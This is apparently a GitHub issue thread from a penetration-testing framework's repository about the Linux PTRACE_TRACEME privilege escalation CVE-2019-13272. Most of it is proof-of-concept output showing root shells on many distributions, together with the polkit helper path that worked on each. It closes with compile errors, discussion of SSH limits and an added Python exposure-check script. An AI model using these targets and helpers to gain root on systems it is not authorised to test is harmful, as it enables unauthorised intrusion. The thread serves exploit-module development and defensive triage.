Metasploit-framework: Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME (CVE-2019-13272)

Created on 18 Jul 2019 · 14 Comments · Source: rapid7/metasploit-framework

All 14 comments

Debian

Debian 10 (xfce)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@debian-10-0-0-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@debian-10-0-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(user)
root@debian-10-0-0-x64:/home/user/Desktop/47133# 

Debian 9.4 (xfce)

/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper

user@debian9-4-0-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@debian9-4-0-x64:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),113(lpadmin),117(scanner),1000(user)

Devuan 2.0.0 (xfce)

/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper

user@devuan-2-0-0:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
root@devuan-2-0-0:/home/user/Desktop/47133#

SparkyLinux 5 (lxqt)

/usr/bin/lxqt-backlight_backend

user@sparkylinux-5-x64:~/47133$ ./a.out 
executing passwd
attached to midpid
root@sparkylinux-5-x64:/home/user/47133# id
uid=0(root) gid=0(root) groups=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),104(scanner),107(lpadmin),113(netdev),114(bluetooth),1000(user)
root@sparkylinux-5-x64:/home/user/47133#

Ubuntu

Ubuntu 16.04.5 (unity)

/usr/lib/unity-settings-daemon/usd-backlight-helper

user@ubuntu-16-04-5-x64:~/Desktop/kernel-exploits/CVE-2019-13272$ ./a.out 
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[~] Using helper: /usr/lib/unity-settings-daemon/usd-backlight-helper
[.] Spawning suid process (/usr/bin/pkexec) ...
[.] Tracing midpid ...
[~] Attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-16-04-5-x64:/home/user/Desktop/kernel-exploits/CVE-2019-13272# 

Ubuntu 18.04 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@ubuntu:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu:/home/user/Desktop/47133# 

Ubuntu 19.04 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@ubuntu-19-04-x64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-19-04-x64:/home/user/Desktop/47133# 

Ubuntu Mate 19.04 (mate)

/usr/sbin/mate-power-backlight-helper

user@ubuntu-mate-19-04-desktop-amd64:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@ubuntu-mate-19-04-desktop-amd64:/home/user/Desktop/47133# 

Linux Mint 19-v2 (mate)

/usr/sbin/mate-power-backlight-helper

user@linux-mint-19-2:~/Desktop/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@linux-mint-19-2:/home/user/Desktop/47133# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),128(sambashare),1000(user)
root@linux-mint-19-2:/home/user/Desktop/47133# 

Elementary OS 0.4.1 (gnome)

/usr/lib/gnome-settings-daemon/gsd-backlight-helper

user@elementary-os-0-4-1-20170517:~/47133$ ./a.out 
executing passwd
attached to midpid
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@elementary-os-0-4-1-20170517:/home/user/47133# exit

Fedora / CentOS / RHEL

Fedora 30 Workstation (gnome)

/usr/libexec/gsd-wacom-led-helper
/usr/libexec/gsd-wacom-oled-helper

[user@localhost CVE-2019-13272]$ ./a.out 
Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[~] Done, looks good
[.] Searching for known helpers ...
[~] Found known helper: /usr/libexec/gsd-wacom-led-helper
[.] Spawning pkexec ...
[.] Tracing midpid ...
[~] Attached to midpid
[root@localhost CVE-2019-13272]# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Arch

Manjaro 18.0.3 (xfce)

/usr/bin/xfpm-power-backlight-helper

[user@manjaro-xfce-18-0-3-x86-64 47133]$ ./a.out 
executing passwd
attached to midpid
[manjaro-xfce-18-0-3-x86-64 47133]# 

Mageia 6 (gnome)

/usr/libexec/gsd-backlight-helper

[user@localhost 47133]$ ./a.out 
executing passwd
attached to midpid
[root@localhost 47133]#

Antergos 18.7 (gnome)

Antergos was recently EOL (last release 2019-04-04)

/usr/lib/gsd-wacom-oled-helper
/usr/lib/gsd-backlight-helper

[user@antergos 47133]$ ./a.out 
executing passwd
attached to midpid
[root@antergos 47133]# id
uid=0(root) gid=0(root) groups=0(root),985(users),998(wheel)
[root@antergos 47133]# exit

Is there some way we can look up the helper dynamically? Or is it ok just to list them so we have one for every vulnerable distro?
I tried this briefly and unsuccessfully on Ubuntu 18.04

Yes, I'll implement automatic targeting.

I downloaded the poc without modifications and it reboots my device (android pie), any idea if Android is vulnerable and if not, why?

fyi it works for me on ubuntu 18.04 as a logged in user, but not over ssh:

ssh user@vulnerable
user@ubuntu:~$ ./a.out
executing passwd
Error executing command as another user: Not authorized

This incident has been reported.

(I'm already logged in as the same user)

Correct. Console lock is not sufficient for pkexec. Need an active pkexec session.

anyone who was able to make it work over SSH? POC?

are there any other binaries which meet the requirements like pkexec helpers which do not require active pkexec session? To make it work via ssh?

Updated C exploit here:

Cannot compile in aarch64

What's the error? What's the OS?

CVE-2019-13272.c:181:24: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
    execl(pkexec_path, basename(pkexec_path), NULL);
                       ^
CVE-2019-13272.c:181:24: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
    execl(pkexec_path, basename(pkexec_path), NULL);
                       ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
                                          ^
CVE-2019-13272.c:198:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
                     ^
CVE-2019-13272.c:198:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
  execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
                     ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:104:43: note: passing argument to parameter '__arg0' here
int execl(const char* __path, const char* __arg0, ...) __attribute__((__sentinel__));
                                          ^
CVE-2019-13272.c:215:38: error: no member named 'rsp' in 'struct user_regs_struct'; did you mean 'sp'?
  unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
                                     ^~~
                                     sp
/data/data/com.termux/files/usr/include/sys/user.h:242:12: note: 'sp' declared here
  uint64_t sp;
           ^
CVE-2019-13272.c:233:8: error: no member named 'orig_rax' in 'struct user_regs_struct'
  regs.orig_rax = __NR_execveat;
  ~~~~ ^
CVE-2019-13272.c:234:8: error: no member named 'rdi' in 'struct user_regs_struct'
  regs.rdi = exec_fd;
  ~~~~ ^
CVE-2019-13272.c:235:8: error: no member named 'rsi' in 'struct user_regs_struct'
  regs.rsi = scratch_area + offsetof(struct injected_page, path);
  ~~~~ ^
CVE-2019-13272.c:236:8: error: no member named 'rdx' in 'struct user_regs_struct'
  regs.rdx = scratch_area + offsetof(struct injected_page, argv);
  ~~~~ ^
CVE-2019-13272.c:237:8: error: no member named 'r10' in 'struct user_regs_struct'
  regs.r10 = scratch_area + offsetof(struct injected_page, envv);
  ~~~~ ^
CVE-2019-13272.c:238:8: error: no member named 'r8' in 'struct user_regs_struct'
  regs.r8 = AT_EMPTY_PATH;
  ~~~~ ^
CVE-2019-13272.c:258:17: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
  execlp(SHELL, basename(SHELL), NULL);
                ^
CVE-2019-13272.c:258:17: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
  execlp(SHELL, basename(SHELL), NULL);
                ^~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/unistd.h:105:44: note: passing argument to parameter '__arg0' here
int execlp(const char* __file, const char* __arg0, ...) __attribute__((__sentinel__));
                                           ^
CVE-2019-13272.c:406:6: warning: implicit declaration of function 'strchrnul' is invalid in C99 [-Wimplicit-function-declaration]
    *strchrnul(buf, '\n') = '\0';
     ^
CVE-2019-13272.c:406:5: error: indirection requires pointer operand ('int' invalid)
    *strchrnul(buf, '\n') = '\0';
    ^~~~~~~~~~~~~~~~~~~~~
CVE-2019-13272.c:407:22: warning: implicit declaration of function 'basename' is invalid in C99 [-Wimplicit-function-declaration]
    if (strncmp(buf, basename(helper_path), 15) == 0)
                     ^
CVE-2019-13272.c:407:22: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'const char *' [-Wint-conversion]
    if (strncmp(buf, basename(helper_path), 15) == 0)
                     ^~~~~~~~~~~~~~~~~~~~~
/data/data/com.termux/files/usr/include/string.h:137:44: note: passing argument to parameter '__rhs' here
int strncmp(const char* __lhs, const char* __rhs, size_t __n) __attribute_pure__;
                                           ^
9 warnings and 8 errors generated.

Android Pie with Linux kernel 4.9.106, using Termux terminal environment.
gcc: clang-8

This exploit doesn't work on Android
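A defender-side triage check assembled from the facts reported in this thread (an added example, not code from the Metasploit project or from any commenter): it parses a `uname -r` string against the "Linux 4.10 < 5.1.17" window printed by the exploit banner, checks whether `/usr/bin/pkexec` is setuid, and lists which of the polkit helper paths from the test results above exist on the host. The helper list and the `/usr/bin/pkexec` path are taken from the thread; treating all three conditions as necessary is this example's own assumption.

```python
import os
import re
import stat

# Affected kernel window as printed by the exploit banner quoted in this thread:
# "Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)".
AFFECTED_MIN = (4, 10, 0)   # first affected release (inclusive)
FIXED_IN = (5, 1, 17)       # first fixed release (exclusive)

# setuid pkexec and the polkit helper binaries reported in the thread above.
PKEXEC = "/usr/bin/pkexec"
KNOWN_HELPERS = [
    "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
    "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
    "/usr/bin/lxqt-backlight_backend",
    "/usr/lib/unity-settings-daemon/usd-backlight-helper",
    "/usr/sbin/mate-power-backlight-helper",
    "/usr/libexec/gsd-wacom-led-helper",
    "/usr/libexec/gsd-wacom-oled-helper",
    "/usr/bin/xfpm-power-backlight-helper",
    "/usr/libexec/gsd-backlight-helper",
    "/usr/lib/gsd-wacom-oled-helper",
    "/usr/lib/gsd-backlight-helper",
]

def parse_kernel_release(release):
    """Turn a `uname -r` string such as '4.15.0-55-generic' into (major, minor, patch)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))

def kernel_in_affected_range(release):
    """True when the upstream version lies in [4.10, 5.1.17)."""
    return AFFECTED_MIN <= parse_kernel_release(release) < FIXED_IN

def assess(release, helper_paths=KNOWN_HELPERS, pkexec=PKEXEC):
    """Combine the preconditions seen in this thread into one triage record."""
    present = [p for p in helper_paths if os.path.isfile(p)]
    pkexec_suid = os.path.isfile(pkexec) and bool(os.stat(pkexec).st_mode & stat.S_ISUID)
    affected = kernel_in_affected_range(release)
    return {
        "kernel": release,
        "kernel_affected": affected,
        "pkexec_suid": pkexec_suid,
        "helpers_present": present,
        # assumption: all three must hold for this technique to be a concern
        "exposed": affected and pkexec_suid and bool(present),
    }

if __name__ == "__main__":
    import platform
    for key, value in assess(platform.release()).items():
        print("%-16s %s" % (key, value))
```

Distribution kernels backport fixes without bumping the upstream version string, so a hit on the version check means "confirm against the distro advisory", not "confirmed vulnerable".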
